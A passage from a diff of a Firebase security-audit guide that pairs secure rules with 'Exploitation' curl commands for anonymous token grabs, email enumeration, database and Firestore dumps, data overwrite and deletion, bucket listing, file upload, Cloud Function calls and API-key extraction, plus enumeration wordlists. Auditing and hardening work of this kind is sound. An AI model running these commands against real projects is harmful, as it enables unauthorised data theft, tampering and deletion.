60
|
+
- [ ] Test `accounts:signUp` endpoint with API key
|
|
61
|
+
- [ ] Check if `ADMIN_ONLY_OPERATION` error is returned
|
|
62
|
+
- [ ] Verify user creation is restricted to admin SDK
|
|
63
|
+
- [ ] Review if app legitimately needs public signup
|
|
64
|
+
|
|
65
|
+
---
|
|
66
|
+
|
|
67
|
+
## 2. ANONYMOUS AUTHENTICATION ENABLED (High)
|
|
68
|
+
|
|
69
|
+
**The Problem:** Anonymous auth creates real Firebase users with valid tokens, bypassing `auth != null` security rules.
|
|
70
|
+
|
|
71
|
+
**Vulnerable Configuration:**
|
|
72
|
+
```
|
|
73
|
+
Firebase Console → Authentication → Sign-in method → Anonymous: Enabled
|
|
74
|
+
```
|
|
75
|
+
|
|
76
|
+
**Exploitation:**
|
|
77
|
+
```bash
|
|
78
|
+
# Get anonymous auth token
|
|
79
|
+
curl -X POST \
|
|
80
|
+
-H "Content-Type: application/json" \
|
|
81
|
+
-d '{"returnSecureToken":true}' \
|
|
82
|
+
"https://identitytoolkit.googleapis.com/v1/accounts:signUp?key=AIzaXXXXXX"
|
|
83
|
+
```
|
|
84
|
+
|
|
85
|
+
**Successful Attack Response:**
|
|
86
|
+
```json
|
|
87
|
+
{
|
|
88
|
+
"idToken": "eyJhbGciOiJSUzI1NiIs...",
|
|
89
|
+
"refreshToken": "AGEhc0B...",
|
|
90
|
+
"expiresIn": "3600",
|
|
91
|
+
"localId": "anon_user_id_123"
|
|
92
|
+
}
|
|
93
|
+
```
|
|
94
|
+
|
|
95
|
+
**Bypassing "Authenticated Only" Rules:**
|
|
96
|
+
```javascript
|
|
97
|
+
// These rules are BYPASSED by anonymous auth
|
|
98
|
+
{
|
|
99
|
+
"rules": {
|
|
100
|
+
".read": "auth != null", // Anonymous user passes this!
|
|
101
|
+
".write": "auth != null"
|
|
102
|
+
}
|
|
103
|
+
}
|
|
104
|
+
```
|
|
105
|
+
|
|
106
|
+
**Attack with Token:**
|
|
107
|
+
```bash
|
|
108
|
+
# Access "authenticated" resources with anonymous token
|
|
109
|
+
curl "https://PROJECT.firebaseio.com/users.json?auth=eyJhbGciOiJSUzI1NiIs..."
|
|
110
|
+
```
|
|
111
|
+
|
|
112
|
+
**Secure Rules (Require Real Users):**
|
|
113
|
+
```javascript
|
|
114
|
+
{
|
|
115
|
+
"rules": {
|
|
116
|
+
".read": "auth != null && auth.token.email_verified == true",
|
|
117
|
+
".write": "auth != null && auth.provider !== 'anonymous'"
|
|
118
|
+
}
|
|
119
|
+
}
|
|
120
|
+
```
|
|
121
|
+
|
|
122
|
+
**Audit Checklist:**
|
|
123
|
+
- [ ] Test anonymous signup endpoint
|
|
124
|
+
- [ ] If token returned, test database/storage access with it
|
|
125
|
+
- [ ] Check if security rules distinguish anonymous vs real users
|
|
126
|
+
- [ ] Verify business need for anonymous authentication
|
|
127
|
+
|
|
128
|
+
---
|
|
129
|
+
|
|
130
|
+
## 3. EMAIL ENUMERATION (Medium)
|
|
131
|
+
|
|
132
|
+
**The Problem:** The `createAuthUri` endpoint reveals whether an email is registered.
|
|
133
|
+
|
|
134
|
+
**Vulnerable Response:**
|
|
135
|
+
```bash
|
|
136
|
+
curl -X POST \
|
|
137
|
+
-H "Content-Type: application/json" \
|
|
138
|
+
-d '{"identifier":"victim@company.com","continueUri":"https://localhost"}' \
|
|
139
|
+
"https://identitytoolkit.googleapis.com/v1/accounts:createAuthUri?key=AIzaXXXXXX"
|
|
140
|
+
```
|
|
141
|
+
|
|
142
|
+
**Information Disclosure Response:**
|
|
143
|
+
```json
|
|
144
|
+
{
|
|
145
|
+
"kind": "identitytoolkit#CreateAuthUriResponse",
|
|
146
|
+
"registered": true, // LEAKS registration status
|
|
147
|
+
"sessionId": "...",
|
|
148
|
+
"signinMethods": ["password"] // LEAKS auth methods
|
|
149
|
+
}
|
|
150
|
+
```
|
|
151
|
+
|
|
152
|
+
**Impact:**
|
|
153
|
+
- User enumeration for targeted attacks
|
|
154
|
+
- Credential stuffing reconnaissance
|
|
155
|
+
- Social engineering intelligence
|
|
156
|
+
|
|
157
|
+
**Secure Configuration:**
|
|
158
|
+
```
|
|
159
|
+
Firebase Console → Authentication → Settings → User enumeration protection: Enabled
|
|
160
|
+
```
|
|
161
|
+
|
|
162
|
+
**Audit Checklist:**
|
|
163
|
+
- [ ] Test `createAuthUri` with known and unknown emails
|
|
164
|
+
- [ ] Check if `registered` field varies between existing/non-existing users
|
|
165
|
+
- [ ] Verify email enumeration protection is enabled
|
|
166
|
+
|
|
167
|
+
---
|
|
168
|
+
|
|
169
|
+
## 4. REALTIME DATABASE UNAUTHENTICATED READ (Critical)
|
|
170
|
+
|
|
171
|
+
**The Problem:** Database rules allow public read access to all data.
|
|
172
|
+
|
|
173
|
+
**Vulnerable Rules:**
|
|
174
|
+
```json
|
|
175
|
+
{
|
|
176
|
+
"rules": {
|
|
177
|
+
".read": true,
|
|
178
|
+
".write": false
|
|
179
|
+
}
|
|
180
|
+
}
|
|
181
|
+
```
|
|
182
|
+
|
|
183
|
+
**Exploitation:**
|
|
184
|
+
```bash
|
|
185
|
+
# Read entire database
|
|
186
|
+
curl "https://PROJECT-ID.firebaseio.com/.json"
|
|
187
|
+
|
|
188
|
+
# Read with shallow query (shows structure even if full read denied)
|
|
189
|
+
curl "https://PROJECT-ID.firebaseio.com/.json?shallow=true"
|
|
190
|
+
|
|
191
|
+
# Read specific paths
|
|
192
|
+
curl "https://PROJECT-ID.firebaseio.com/users.json"
|
|
193
|
+
curl "https://PROJECT-ID.firebaseio.com/messages.json"
|
|
194
|
+
curl "https://PROJECT-ID.firebaseio.com/orders.json"
|
|
195
|
+
```
|
|
196
|
+
|
|
197
|
+
**Data Exposure Response:**
|
|
198
|
+
```json
|
|
199
|
+
{
|
|
200
|
+
"users": {
|
|
201
|
+
"user123": {
|
|
202
|
+
"email": "john@example.com",
|
|
203
|
+
"phone": "+1234567890",
|
|
204
|
+
"address": "123 Main St"
|
|
205
|
+
}
|
|
206
|
+
},
|
|
207
|
+
"api_keys": {
|
|
208
|
+
"stripe": "sk_live_XXXX",
|
|
209
|
+
"twilio": "ACXXXX"
|
|
210
|
+
}
|
|
211
|
+
}
|
|
212
|
+
```
|
|
213
|
+
|
|
214
|
+
**Secure Rules:**
|
|
215
|
+
```json
|
|
216
|
+
{
|
|
217
|
+
"rules": {
|
|
218
|
+
".read": false,
|
|
219
|
+
".write": false,
|
|
220
|
+
"users": {
|
|
221
|
+
"$uid": {
|
|
222
|
+
".read": "$uid === auth.uid",
|
|
223
|
+
".write": "$uid === auth.uid"
|
|
224
|
+
}
|
|
225
|
+
},
|
|
226
|
+
"public": {
|
|
227
|
+
".read": true,
|
|
228
|
+
".write": false
|
|
229
|
+
}
|
|
230
|
+
}
|
|
231
|
+
}
|
|
232
|
+
```
|
|
233
|
+
|
|
234
|
+
**Audit Checklist:**
|
|
235
|
+
- [ ] Test root read: `/.json`
|
|
236
|
+
- [ ] Test shallow query: `/.json?shallow=true`
|
|
237
|
+
- [ ] Enumerate common paths: users, messages, orders, config, admin
|
|
238
|
+
- [ ] Check for sensitive data exposure (PII, API keys, tokens)
|
|
239
|
+
|
|
240
|
+
---
|
|
241
|
+
|
|
242
|
+
## 5. REALTIME DATABASE UNAUTHENTICATED WRITE (Critical)
|
|
243
|
+
|
|
244
|
+
**The Problem:** Database rules allow public write access, enabling data manipulation or injection.
|
|
245
|
+
|
|
246
|
+
**Vulnerable Rules:**
|
|
247
|
+
```json
|
|
248
|
+
{
|
|
249
|
+
"rules": {
|
|
250
|
+
".read": false,
|
|
251
|
+
".write": true // CRITICAL VULNERABILITY
|
|
252
|
+
}
|
|
253
|
+
}
|
|
254
|
+
```
|
|
255
|
+
|
|
256
|
+
**Exploitation:**
|
|
257
|
+
```bash
|
|
258
|
+
# Write arbitrary data
|
|
259
|
+
curl -X PUT \
|
|
260
|
+
-H "Content-Type: application/json" \
|
|
261
|
+
-d '{"attacker":"was_here","timestamp":1234567890}' \
|
|
262
|
+
"https://PROJECT-ID.firebaseio.com/pwned.json"
|
|
263
|
+
|
|
264
|
+
# Overwrite existing data
|
|
265
|
+
curl -X PUT \
|
|
266
|
+
-H "Content-Type: application/json" \
|
|
267
|
+
-d '{"role":"admin"}' \
|
|
268
|
+
"https://PROJECT-ID.firebaseio.com/users/victim_uid/profile.json"
|
|
269
|
+
|
|
270
|
+
# Delete data
|
|
271
|
+
curl -X DELETE "https://PROJECT-ID.firebaseio.com/important_data.json"
|
|
272
|
+
```
|
|
273
|
+
|
|
274
|
+
**Impact:**
|
|
275
|
+
- Data tampering and corruption
|
|
276
|
+
- Privilege escalation (modify user roles)
|
|
277
|
+
- Inject malicious content
|
|
278
|
+
- Delete critical data
|
|
279
|
+
- Store illegal content
|
|
280
|
+
|
|
281
|
+
**Secure Rules:**
|
|
282
|
+
```json
|
|
283
|
+
{
|
|
284
|
+
"rules": {
|
|
285
|
+
".write": false,
|
|
286
|
+
"user_content": {
|
|
287
|
+
"$uid": {
|
|
288
|
+
".write": "$uid === auth.uid",
|
|
289
|
+
".validate": "newData.hasChildren(['title', 'body']) && newData.child('title').isString()"
|
|
290
|
+
}
|
|
291
|
+
}
|
|
292
|
+
}
|
|
293
|
+
}
|
|
294
|
+
```
|
|
295
|
+
|
|
296
|
+
**Audit Checklist:**
|
|
297
|
+
- [ ] Test write to test path: `/_security_test.json`
|
|
298
|
+
- [ ] Attempt to modify existing data paths
|
|
299
|
+
- [ ] Check if validation rules exist
|
|
300
|
+
- [ ] Clean up any test data written
|
|
301
|
+
|
|
302
|
+
---
|
|
303
|
+
|
|
304
|
+
## 6. FIRESTORE OPEN DOCUMENT ACCESS (Critical)
|
|
305
|
+
|
|
306
|
+
**The Problem:** Firestore security rules allow public access to collections.
|
|
307
|
+
|
|
308
|
+
**Vulnerable Rules:**
|
|
309
|
+
```javascript
|
|
310
|
+
rules_version = '2';
|
|
311
|
+
service cloud.firestore {
|
|
312
|
+
match /databases/{database}/documents {
|
|
313
|
+
match /{document=**} {
|
|
314
|
+
allow read, write: if true; // OPEN TO EVERYONE
|
|
315
|
+
}
|
|
316
|
+
}
|
|
317
|
+
}
|
|
318
|
+
```
|
|
319
|
+
|
|
320
|
+
**Exploitation:**
|
|
321
|
+
```bash
|
|
322
|
+
# List root collections
|
|
323
|
+
curl "https://firestore.googleapis.com/v1/projects/PROJECT-ID/databases/(default)/documents"
|
|
324
|
+
|
|
325
|
+
# Read specific collection
|
|
326
|
+
curl "https://firestore.googleapis.com/v1/projects/PROJECT-ID/databases/(default)/documents/users"
|
|
327
|
+
|
|
328
|
+
# Read specific document
|
|
329
|
+
curl "https://firestore.googleapis.com/v1/projects/PROJECT-ID/databases/(default)/documents/users/admin"
|
|
330
|
+
```
|
|
331
|
+
|
|
332
|
+
**Write Attack:**
|
|
333
|
+
```bash
|
|
334
|
+
# Create document
|
|
335
|
+
curl -X POST \
|
|
336
|
+
-H "Content-Type: application/json" \
|
|
337
|
+
-d '{"fields":{"role":{"stringValue":"admin"},"injected":{"booleanValue":true}}}' \
|
|
338
|
+
"https://firestore.googleapis.com/v1/projects/PROJECT-ID/databases/(default)/documents/users"
|
|
339
|
+
```
|
|
340
|
+
|
|
341
|
+
**Common Sensitive Collections to Test:**
|
|
342
|
+
```
|
|
343
|
+
users, accounts, profiles, members, customers, clients,
|
|
344
|
+
orders, transactions, payments, invoices, billing,
|
|
345
|
+
messages, chats, conversations, notifications,
|
|
346
|
+
settings, config, admin, secrets, tokens, api_keys,
|
|
347
|
+
sessions, credentials, passwords, logs, audit
|
|
348
|
+
```
|
|
349
|
+
|
|
350
|
+
**Secure Rules:**
|
|
351
|
+
```javascript
|
|
352
|
+
rules_version = '2';
|
|
353
|
+
service cloud.firestore {
|
|
354
|
+
match /databases/{database}/documents {
|
|
355
|
+
// Deny all by default
|
|
356
|
+
match /{document=**} {
|
|
357
|
+
allow read, write: if false;
|
|
358
|
+
}
|
|
359
|
+
|
|
360
|
+
// User-specific access
|
|
361
|
+
match /users/{userId} {
|
|
362
|
+
allow read, write: if request.auth != null && request.auth.uid == userId;
|
|
363
|
+
}
|
|
364
|
+
|
|
365
|
+
// Public read, authenticated write
|
|
366
|
+
match /public/{docId} {
|
|
367
|
+
allow read: if true;
|
|
368
|
+
allow write: if request.auth != null;
|
|
369
|
+
}
|
|
370
|
+
}
|
|
371
|
+
}
|
|
372
|
+
```
|
|
373
|
+
|
|
374
|
+
**Audit Checklist:**
|
|
375
|
+
- [ ] Test root document listing
|
|
376
|
+
- [ ] Enumerate common collection names
|
|
377
|
+
- [ ] Test write access to collections
|
|
378
|
+
- [ ] Check for PII and sensitive data exposure
|
|
379
|
+
- [ ] Verify rules use `request.auth.uid` for user data
|
|
380
|
+
|
|
381
|
+
---
|
|
382
|
+
|
|
383
|
+
## 7. FIREBASE STORAGE BUCKET LISTING (High)
|
|
384
|
+
|
|
385
|
+
**The Problem:** Storage rules allow listing bucket contents, exposing all stored files.
|
|
386
|
+
|
|
387
|
+
**Vulnerable Rules:**
|
|
388
|
+
```javascript
|
|
389
|
+
rules_version = '2';
|
|
390
|
+
service firebase.storage {
|
|
391
|
+
match /b/{bucket}/o {
|
|
392
|
+
match /{allPaths=**} {
|
|
393
|
+
allow read, write: if true;
|
|
394
|
+
}
|
|
395
|
+
}
|
|
396
|
+
}
|
|
397
|
+
```
|
|
398
|
+
|
|
399
|
+
**Exploitation:**
|
|
400
|
+
```bash
|
|
401
|
+
# List all files in bucket
|
|
402
|
+
curl "https://firebasestorage.googleapis.com/v0/b/PROJECT-ID.appspot.com/o"
|
|
403
|
+
|
|
404
|
+
# Alternative: gs:// format bucket
|
|
405
|
+
curl "https://firebasestorage.googleapis.com/v0/b/PROJECT-ID/o"
|
|
406
|
+
```
|
|
407
|
+
|
|
408
|
+
**Exposed Files Response:**
|
|
409
|
+
```json
|
|
410
|
+
{
|
|
411
|
+
"items": [
|
|
412
|
+
{
|
|
413
|
+
"name": "user_uploads/private_document.pdf",
|
|
414
|
+
"bucket": "project-id.appspot.com",
|
|
415
|
+
"contentType": "application/pdf",
|
|
416
|
+
"size": "1048576",
|
|
417
|
+
"downloadTokens": "abc123"
|
|
418
|
+
},
|
|
419
|
+
{
|
|
420
|
+
"name": "backups/database_dump_2024.sql",
|
|
421
|
+
"bucket": "project-id.appspot.com"
|
|
422
|
+
}
|
|
423
|
+
]
|
|
424
|
+
}
|
|
425
|
+
```
|
|
426
|
+
|
|
427
|
+
**Download Exposed Files:**
|
|
428
|
+
```bash
|
|
429
|
+
# Download using the file path
|
|
430
|
+
curl "https://firebasestorage.googleapis.com/v0/b/PROJECT-ID.appspot.com/o/user_uploads%2Fprivate_document.pdf?alt=media"
|
|
431
|
+
```
|
|
432
|
+
|
|
433
|
+
**Impact:**
|
|
434
|
+
- Exposure of user-uploaded content
|
|
435
|
+
- Access to backup files
|
|
436
|
+
- Private documents, images, videos leaked
|
|
437
|
+
- Potential credential/key exposure in uploaded files
|
|
438
|
+
|
|
439
|
+
**Secure Rules:**
|
|
440
|
+
```javascript
|
|
441
|
+
rules_version = '2';
|
|
442
|
+
service firebase.storage {
|
|
443
|
+
match /b/{bucket}/o {
|
|
444
|
+
// Deny listing by default
|
|
445
|
+
match /{allPaths=**} {
|
|
446
|
+
allow read, write: if false;
|
|
447
|
+
}
|
|
448
|
+
|
|
449
|
+
// User-specific folders
|
|
450
|
+
match /users/{userId}/{allPaths=**} {
|
|
451
|
+
allow read, write: if request.auth != null && request.auth.uid == userId;
|
|
452
|
+
}
|
|
453
|
+
|
|
454
|
+
// Public assets (no listing)
|
|
455
|
+
match /public/{fileId} {
|
|
456
|
+
allow read: if true;
|
|
457
|
+
allow write: if request.auth != null;
|
|
458
|
+
}
|
|
459
|
+
}
|
|
460
|
+
}
|
|
461
|
+
```
|
|
462
|
+
|
|
463
|
+
**Audit Checklist:**
|
|
464
|
+
- [ ] Test bucket listing endpoint
|
|
465
|
+
- [ ] Check both `.appspot.com` and raw bucket names
|
|
466
|
+
- [ ] Look for sensitive file types (sql, pdf, json, env)
|
|
467
|
+
- [ ] Attempt to download exposed files
|
|
468
|
+
- [ ] Check for backup or admin directories
|
|
469
|
+
|
|
470
|
+
---
|
|
471
|
+
|
|
472
|
+
## 8. FIREBASE STORAGE UNAUTHENTICATED UPLOAD (Critical)
|
|
473
|
+
|
|
474
|
+
**The Problem:** Anyone can upload files to the storage bucket.
|
|
475
|
+
|
|
476
|
+
**Exploitation:**
|
|
477
|
+
```bash
|
|
478
|
+
# Upload arbitrary file
|
|
479
|
+
curl -X POST \
|
|
480
|
+
-H "Content-Type: text/plain" \
|
|
481
|
+
--data-binary "malicious content here" \
|
|
482
|
+
"https://firebasestorage.googleapis.com/v0/b/PROJECT-ID.appspot.com/o?uploadType=media&name=pwned.txt"
|
|
483
|
+
```
|
|
484
|
+
|
|
485
|
+
**Impact:**
|
|
486
|
+
- Storage quota exhaustion (billing attack)
|
|
487
|
+
- Malware hosting
|
|
488
|
+
- Phishing page hosting
|
|
489
|
+
- Illegal content storage (legal liability)
|
|
490
|
+
- Overwrite existing files
|
|
491
|
+
|
|
492
|
+
**Secure Rules with Validation:**
|
|
493
|
+
```javascript
|
|
494
|
+
rules_version = '2';
|
|
495
|
+
service firebase.storage {
|
|
496
|
+
match /b/{bucket}/o {
|
|
497
|
+
match /user_uploads/{userId}/{fileName} {
|
|
498
|
+
allow write: if request.auth != null
|
|
499
|
+
&& request.auth.uid == userId
|
|
500
|
+
&& request.resource.size < 5 * 1024 * 1024 // 5MB limit
|
|
501
|
+
&& request.resource.contentType.matches('image/.*'); // Images only
|
|
502
|
+
}
|
|
503
|
+
}
|
|
504
|
+
}
|
|
505
|
+
```
|
|
506
|
+
|
|
507
|
+
**Audit Checklist:**
|
|
508
|
+
- [ ] Test file upload to various paths
|
|
509
|
+
- [ ] Check if content type restrictions exist
|
|
510
|
+
- [ ] Verify file size limits
|
|
511
|
+
- [ ] Test overwriting existing files
|
|
512
|
+
- [ ] Clean up any uploaded test files
|
|
513
|
+
|
|
514
|
+
---
|
|
515
|
+
|
|
516
|
+
## 9. CLOUD FUNCTIONS UNAUTHENTICATED ACCESS (Medium-High)
|
|
517
|
+
|
|
518
|
+
**The Problem:** HTTP-triggered Cloud Functions accessible without authentication.
|
|
519
|
+
|
|
520
|
+
**Vulnerable Function:**
|
|
521
|
+
```javascript
|
|
522
|
+
// No auth check - anyone can call
|
|
523
|
+
exports.processPayment = functions.https.onRequest((req, res) => {
|
|
524
|
+
const { userId, amount } = req.body;
|
|
525
|
+
// Process payment without verifying caller
|
|
526
|
+
processPayment(userId, amount);
|
|
527
|
+
res.send({ success: true });
|
|
528
|
+
});
|
|
529
|
+
```
|
|
530
|
+
|
|
531
|
+
**Exploitation:**
|
|
532
|
+
```bash
|
|
533
|
+
# Call unprotected function
|
|
534
|
+
curl -X POST \
|
|
535
|
+
-H "Content-Type: application/json" \
|
|
536
|
+
-d '{"userId":"victim123","amount":0.01}' \
|
|
537
|
+
"https://us-central1-PROJECT-ID.cloudfunctions.net/processPayment"
|
|
538
|
+
|
|
539
|
+
# Test callable function
|
|
540
|
+
curl -X POST \
|
|
541
|
+
-H "Content-Type: application/json" \
|
|
542
|
+
-d '{"data":{}}' \
|
|
543
|
+
"https://us-central1-PROJECT-ID.cloudfunctions.net/adminFunction"
|
|
544
|
+
```
|
|
545
|
+
|
|
546
|
+
**Common Function Names to Enumerate:**
|
|
547
|
+
```
|
|
548
|
+
login, logout, register, signup, authenticate, verify,
|
|
549
|
+
createUser, deleteUser, updateUser, getUser, getUsers,
|
|
550
|
+
processPayment, createOrder, sendEmail, sendNotification,
|
|
551
|
+
uploadFile, generateToken, validateToken, refreshToken,
|
|
552
|
+
getData, setData, syncData, backup, restore, export,
|
|
553
|
+
webhook, callback, api, admin, debug, test, healthcheck
|
|
554
|
+
```
|
|
555
|
+
|
|
556
|
+
**Regions to Test:**
|
|
557
|
+
```
|
|
558
|
+
us-central1, us-east1, us-east4, us-west1,
|
|
559
|
+
europe-west1, europe-west2, europe-west3,
|
|
560
|
+
asia-east1, asia-east2, asia-northeast1, asia-south1
|
|
561
|
+
```
|
|
562
|
+
|
|
563
|
+
**Secure Function:**
|
|
564
|
+
```javascript
|
|
565
|
+
exports.processPayment = functions.https.onCall(async (data, context) => {
|
|
566
|
+
// Verify authentication
|
|
567
|
+
if (!context.auth) {
|
|
568
|
+
throw new functions.https.HttpsError('unauthenticated', 'Must be logged in');
|
|
569
|
+
}
|
|
570
|
+
|
|
571
|
+
// Verify authorization
|
|
572
|
+
if (context.auth.uid !== data.userId) {
|
|
573
|
+
throw new functions.https.HttpsError('permission-denied', 'Cannot process for other users');
|
|
574
|
+
}
|
|
575
|
+
|
|
576
|
+
// Process payment
|
|
577
|
+
return processPayment(context.auth.uid, data.amount);
|
|
578
|
+
});
|
|
579
|
+
```
|
|
580
|
+
|
|
581
|
+
**Audit Checklist:**
|
|
582
|
+
- [ ] Enumerate function names from APK strings
|
|
583
|
+
- [ ] Test each function with GET and POST
|
|
584
|
+
- [ ] Check response codes: 404=doesn't exist, 401/403=exists+protected, 200=accessible
|
|
585
|
+
- [ ] Test callable functions with `{"data":{}}` payload
|
|
586
|
+
- [ ] Try multiple regions
|
|
587
|
+
|
|
588
|
+
---
|
|
589
|
+
|
|
590
|
+
## 10. REMOTE CONFIG PUBLIC EXPOSURE (Medium)
|
|
591
|
+
|
|
592
|
+
**The Problem:** Firebase Remote Config parameters accessible with just the API key.
|
|
593
|
+
|
|
594
|
+
**Exploitation:**
|
|
595
|
+
```bash
|
|
596
|
+
curl -H "x-goog-api-key: AIzaXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX" \
|
|
597
|
+
"https://firebaseremoteconfig.googleapis.com/v1/projects/PROJECT-ID/remoteConfig"
|
|
598
|
+
```
|
|
599
|
+
|
|
600
|
+
**Exposed Configuration Response:**
|
|
601
|
+
```json
|
|
602
|
+
{
|
|
603
|
+
"parameters": {
|
|
604
|
+
"api_endpoint": {
|
|
605
|
+
"defaultValue": { "value": "https://internal-api.company.com" }
|
|
606
|
+
},
|
|
607
|
+
"feature_flags": {
|
|
608
|
+
"defaultValue": { "value": "{\"admin_panel\":true,\"debug_mode\":true}" }
|
|
609
|
+
},
|
|
610
|
+
"third_party_keys": {
|
|
611
|
+
"defaultValue": { "value": "sk_live_XXXXXXXX" }
|
|
612
|
+
}
|
|
613
|
+
}
|
|
614
|
+
}
|
|
615
|
+
```
|
|
616
|
+
|
|
617
|
+
**Impact:**
|
|
618
|
+
- Internal API endpoint discovery
|
|
619
|
+
- Feature flag enumeration
|
|
620
|
+
- Hardcoded secrets exposure
|
|
621
|
+
- Business logic revelation
|
|
622
|
+
|
|
623
|
+
**Secure Practice:**
|
|
624
|
+
```javascript
|
|
625
|
+
// Don't store secrets in Remote Config
|
|
626
|
+
// Use Secret Manager or server-side configuration
|
|
627
|
+
|
|
628
|
+
// Set conditions for sensitive parameters
|
|
629
|
+
{
|
|
630
|
+
"parameters": {
|
|
631
|
+
"debug_mode": {
|
|
632
|
+
"defaultValue": { "value": "false" },
|
|
633
|
+
"conditionalValues": {
|
|
634
|
+
"internal_testers": { "value": "true" }
|
|
635
|
+
}
|
|
636
|
+
}
|
|
637
|
+
}
|
|
638
|
+
}
|
|
639
|
+
```
|
|
640
|
+
|
|
641
|
+
**Audit Checklist:**
|
|
642
|
+
- [ ] Test Remote Config endpoint with API key
|
|
643
|
+
- [ ] Look for hardcoded secrets in parameters
|
|
644
|
+
- [ ] Check for internal URLs or endpoints
|
|
645
|
+
- [ ] Review feature flags for security implications
|
|
646
|
+
|
|
647
|
+
---
|
|
648
|
+
|
|
649
|
+
## 11. INSECURE SECURITY RULES PATTERNS
|
|
650
|
+
|
|
651
|
+
**The Problem:** Common mistakes in Firebase security rules that appear secure but aren't.
|
|
652
|
+
|
|
653
|
+
**Pattern 1: Trusting Client Data**
|
|
654
|
+
```javascript
|
|
655
|
+
// VULNERABLE - client controls isAdmin field
|
|
656
|
+
match /users/{userId} {
|
|
657
|
+
allow write: if request.resource.data.isAdmin == false;
|
|
658
|
+
}
|
|
659
|
+
// Attack: Set isAdmin=false initially, then update to true
|
|
660
|
+
```
|
|
661
|
+
|
|
662
|
+
**Pattern 2: Missing Validation**
|
|
663
|
+
```javascript
|
|
664
|
+
// VULNERABLE - no field validation
|
|
665
|
+
match /posts/{postId} {
|
|
666
|
+
allow create: if request.auth != null;
|
|
667
|
+
}
|
|
668
|
+
// Attack: Create posts with arbitrary fields, including admin flags
|
|
669
|
+
```
|
|
670
|
+
|
|
671
|
+
**Pattern 3: Overly Broad Wildcards**
|
|
672
|
+
```javascript
|
|
673
|
+
// VULNERABLE - matches ANY path
|
|
674
|
+
match /{document=**} {
|
|
675
|
+
allow read: if request.auth != null;
|
|
676
|
+
}
|
|
677
|
+
// Problem: Authenticated users can read ALL data
|
|
678
|
+
```
|
|
679
|
+
|
|
680
|
+
**Pattern 4: Time-Based Rules Without Server Time**
|
|
681
|
+
```javascript
|
|
682
|
+
// VULNERABLE - client can manipulate timestamp
|
|
683
|
+
match /events/{eventId} {
|
|
684
|
+
allow read: if resource.data.publishDate <= request.time;
|
|
685
|
+
}
|
|
686
|
+
// Attack: Client clock manipulation
|
|
687
|
+
```
|
|
688
|
+
|
|
689
|
+
**Secure Patterns:**
|
|
690
|
+
```javascript
|
|
691
|
+
rules_version = '2';
|
|
692
|
+
service cloud.firestore {
|
|
693
|
+
match /databases/{database}/documents {
|
|
694
|
+
|
|
695
|
+
// Function to check admin status from a trusted source
|
|
696
|
+
function isAdmin() {
|
|
697
|
+
return get(/databases/$(database)/documents/admins/$(request.auth.uid)).data.isAdmin == true;
|
|
698
|
+
}
|
|
699
|
+
|
|
700
|
+
// Validate all required fields
|
|
701
|
+
function isValidPost() {
|
|
702
|
+
return request.resource.data.keys().hasAll(['title', 'content', 'authorId'])
|
|
703
|
+
&& request.resource.data.authorId == request.auth.uid
|
|
704
|
+
&& request.resource.data.title is string
|
|
705
|
+
&& request.resource.data.title.size() <= 200;
|
|
706
|
+
}
|
|
707
|
+
|
|
708
|
+
match /posts/{postId} {
|
|
709
|
+
allow create: if request.auth != null && isValidPost();
|
|
710
|
+
allow update: if request.auth.uid == resource.data.authorId;
|
|
711
|
+
allow delete: if request.auth.uid == resource.data.authorId || isAdmin();
|
|
712
|
+
}
|
|
713
|
+
}
|
|
714
|
+
}
|
|
715
|
+
```
|
|
716
|
+
|
|
717
|
+
**Audit Checklist:**
|
|
718
|
+
- [ ] Review rules for client-controlled privilege escalation
|
|
719
|
+
- [ ] Check for field validation on writes
|
|
720
|
+
- [ ] Verify wildcards don't grant excessive access
|
|
721
|
+
- [ ] Look for timestamp manipulation vulnerabilities
|
|
722
|
+
- [ ] Test boundary conditions in rules
|
|
723
|
+
|
|
724
|
+
---
|
|
725
|
+
|
|
726
|
+
## 12. API KEY EXPOSURE AND MISUSE
|
|
727
|
+
|
|
728
|
+
**The Problem:** Firebase API keys extracted from APKs can be used for various attacks.
|
|
729
|
+
|
|
730
|
+
**Extraction Locations:**
|
|
731
|
+
```
|
|
732
|
+
google-services.json → client[].api_key[].current_key
|
|
733
|
+
res/values/strings.xml → google_api_key, firebase_api_key
|
|
734
|
+
assets/*.json → apiKey, api_key
|
|
735
|
+
Smali code → const-string with "AIza"
|
|
736
|
+
Raw DEX strings → strings command output
|
|
737
|
+
```
|
|
738
|
+
|
|
739
|
+
**API Key Format:**
|
|
740
|
+
```
|
|
741
|
+
AIza[A-Za-z0-9_-]{35}
|
|
742
|
+
Example: AIzaSyA1B2C3D4E5F6G7H8I9J0K1L2M3N4O5P6Q
|
|
743
|
+
```
|
|
744
|
+
|
|
745
|
+
**What Attackers Can Do With API Key:**
|
|
746
|
+
| API | Risk | Mitigation |
|
|
747
|
+
|-----|------|------------|
|
|
748
|
+
| Identity Toolkit | Account creation, enumeration | Restrict signup, enable protections |
|
|
749
|
+
| Realtime Database | Read/write if rules allow | Proper security rules |
|
|
750
|
+
| Firestore | Read/write if rules allow | Proper security rules |
|
|
751
|
+
| Storage | Read/write if rules allow | Proper security rules |
|
|
752
|
+
| Remote Config | Read config parameters | Don't store secrets |
|
|
753
|
+
| Cloud Messaging | Send push notifications | Use server keys server-side only |
|
|
754
|
+
|
|
755
|
+
**Secure Practices:**
|
|
756
|
+
```
|
|
757
|
+
Firebase Console → Project Settings → API Keys:
|
|
758
|
+
1. Restrict Android key to your app's SHA-1 fingerprint
|
|
759
|
+
2. Restrict iOS key to your app's bundle ID
|
|
760
|
+
3. Use separate keys for different environments
|
|
761
|
+
4. Monitor key usage in Cloud Console
|
|
762
|
+
5. Never use server/admin keys in client apps
|
|
763
|
+
```
|
|
764
|
+
|
|
765
|
+
**Audit Checklist:**
|
|
766
|
+
- [ ] Extract all API keys from APK
|
|
767
|
+
- [ ] Test each key against Firebase APIs
|
|
768
|
+
- [ ] Check if keys are properly restricted
|
|
769
|
+
- [ ] Look for server keys accidentally included
|
|
770
|
+
- [ ] Verify keys aren't reused across projects
|
|
771
|
+
|
|
772
|
+
---
|
|
773
|
+
|
|
774
|
+
## Quick Reference: Testing Commands
|
|
775
|
+
|
|
776
|
+
```bash
|
|
777
|
+
# Authentication Tests
|
|
778
|
+
curl -X POST -H "Content-Type: application/json" \
|
|
779
|
+
-d '{"email":"test@test.com","password":"Test123!","returnSecureToken":true}' \
|
|
780
|
+
"https://identitytoolkit.googleapis.com/v1/accounts:signUp?key=API_KEY"
|
|
781
|
+
|
|
782
|
+
# Anonymous Auth
|
|
783
|
+
curl -X POST -H "Content-Type: application/json" \
|
|
784
|
+
